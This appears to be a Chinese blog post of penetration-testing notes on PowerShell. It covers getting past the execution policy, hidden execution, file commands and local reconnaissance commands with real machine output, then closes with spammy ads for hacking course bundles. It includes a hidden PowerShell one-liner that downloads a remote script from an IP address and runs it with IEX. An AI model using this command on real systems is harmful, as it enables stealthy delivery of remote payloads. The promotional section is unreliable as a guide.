PowerShell 脚本可以运行在内存中,不需要写入磁盘
可以从另一个系统中下载 PowerShell 脚本并执行
目前很多工具都是基于 PowerShell 开发的
很多安全软件检测不到 PowerShell 的活动
cmd 通常会被阻止运行,但是 PowerShell 不会
可以用来管理活动目录
Get-Host or $PSVersionTable 查看 PowerShell 版本:
ps1文件
它是PowerShell的脚本拓展名,一个PowerShell脚本文件其实就是一个简单的文本文件
执行策略
防止恶意脚本在PowerShell被运行,它存在一个执行策略,默认情况下它是受限模式,Restricted。
通过Get-ExecutionPolicy命令查看当前执行策略
常见的执行策略:
Restricted:不能运行脚本
RemoteSigned:本地创建的脚本可以运行,但从网上下载的脚本不能运行
(除非它们拥有由受信任的发布者签署的数字签名)
AllSigned:仅当脚本由受信任的发布者签名才能运行
Unrestricted:脚本执行不受限制,不管来自哪里,也不管它们是否有签名
使用 Set-Set-ExecutionPolicy 策略名 设置执行策略,但是需要管理员权限
Set-ExecutionPolicy Unrestricted
绕过本地策略执行
上面笔记说了默认情况下,PowerShell的执行策略是Restricted受限模式,导致我们在渗透测试中,需要采用方法绕过这个策略,执行我们的脚本文件
-ExecutionPolicy Bypass绕过受限
cat .\t.ps1echo "Hello TeamsSix"PS C:\Users\teamssix> PowerShell.exe
-ExecutionPolicy Bypass -File t.ps1hello TeamsSix
绕过本地权限并隐藏执行
-WindowStyle Hidden -NoLogo -NonInteractive -NoProfile 即可隐藏执行
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo
-NonInteractive -NoProfile -File t.ps1
下载远程脚本绕过权限并隐藏执行
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo
-NonInteractive -NoProfile
“IEX(New-Object Net.WebClient).DownloadString(‘http://172.16.214.1:8000/t.ps1’)”
运行脚本
运行方式和其他的Shell 基本一致,可以输入完整的路径,也可以到ps1文件所在目录运行
管道
PowerShell中的管道类似于linux中的管道,都是将前一个命令的输出作为另一个命令的输出,两个命令之间使用 '|'进行连接
Get-Process | Sort-Object ID
Get-Process: 用于获取当前系统中正在运行的进程列表。它返回进程的名称、ID、CPU使用情况
Sort-Object: 用于对输入的对象进行排序
所以二者使用管道符连接起来就是对当前进程进行排序,将前一个命令的输出组为另一个命令的输出
命令
新建目录test:New-Item test -ItemType directory
删除目录test:Remove-Item test
新建文件test.txt:New-Item test.txt -ItemType file
新建文件test.txt,内容为 hello:New-Item test.txt -ItemType file -value “hello”
删除文件test.txt:Remove-Item test.txt
查看文件test.txt内容:Get-Content test.txt
设置文件test.txt内容t:Set-Content test.txt -Value “hello”
给文件test.txt追加内容:Add-Content test.txt -Value “,word!”
清除文件test.txt内容:Clear-Content test.txt
本地工作组收集
1.查看当前权限
C:\Users\月>whoami
desktop-liuht7o\月
- 本机网络配置信息
C:\Users\月>ipconfig /all
Windows IP 配置
主机名 . . . . . . . . . . . . . : DESKTOP-LIUHT7O
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 vEthernet (WSL):
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Hyper-V Virtual Ethernet Adapter
物理地址. . . . . . . . . . . . . : 00-15-5D-E5-1F-66
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::b86f:a481:2577:be29%60(首选)
IPv4 地址 . . . . . . . . . . . . : 172.21.64.1(首选)
子网掩码 . . . . . . . . . . . . : 255.255.240.0
默认网关. . . . . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 1006638429
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-2B-9C-AE-9D-B0-25-AA-54-70-20
TCPIP 上的 NetBIOS . . . . . . . : 已启用
无线局域网适配器 本地连接* 3:
- 操作系统和版本信息
C:\Users\月>systeminfo | findstr /B /C:“OS 名称” /C:“OS 版本”
OS 名称: Microsoft Windows 11 家庭中文版
OS 版本: 10.0.22621 暂缺 Build 22621
- 查看系统体系结构
C:\Users\月>echo %PROCESSOR_ARCHITECTURE%
AMD64
- 查看系统所有环境变量
C:\Users\月>set
ALLUSERSPROFILE=C:\ProgramData
ANALYSIS_PATH=D:\Runner
APPCODE_VM_OPTIONS=E:\Java资源\IDEA重置\jetbra\vmoptions\appcode.vmoptions
APPDATA=C:\Users\月\AppData\Roaming
CATALINA_HOME=B:\tomcat\apache-tomcat-8.5.93
ChocolateyInstall=C:\ProgramData\chocolatey
ChocolateyLastPathUpdate=133373369989314223
CLASSPATH=.;E:\jdk \lib
- 查看安装的软件及版本和路径等信息
C:\Users\月>wmic product get name,version
Name Version
Python 3.10.2 Executables (64-bit) 3.10.2150.0
Python 3.10.2 Core Interpreter (64-bit) 3.10.2150.0
Python 3.10.2 Tcl/Tk Support (64-bit) 3.10.2150.0
Python 3.10.2 Utility Scripts (64-bit) 3.10.2150.0
Python 3.10.2 Standard Library (64-bit)
- 查看当前用户
net user
PS C:\Users\月> net user
\DESKTOP-LIUHT7O 的用户帐户
Administrator DefaultAccount Guest
WDAGUtilityAccount 月
命令成功完成。
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
如何自学黑客&网络安全
黑客零基础入门学习路线&规划
初级黑客
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。
8、超级黑客
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的
视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
一些笔者自己买的、其他平台白嫖不到的视频教程。
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
78a3fe5198265bed9635d63469.webp?x-oss-process=image/format,png)
一些笔者自己买的、其他平台白嫖不到的视频教程。
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-zir8ZBJt-1712611625655)]
5559
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
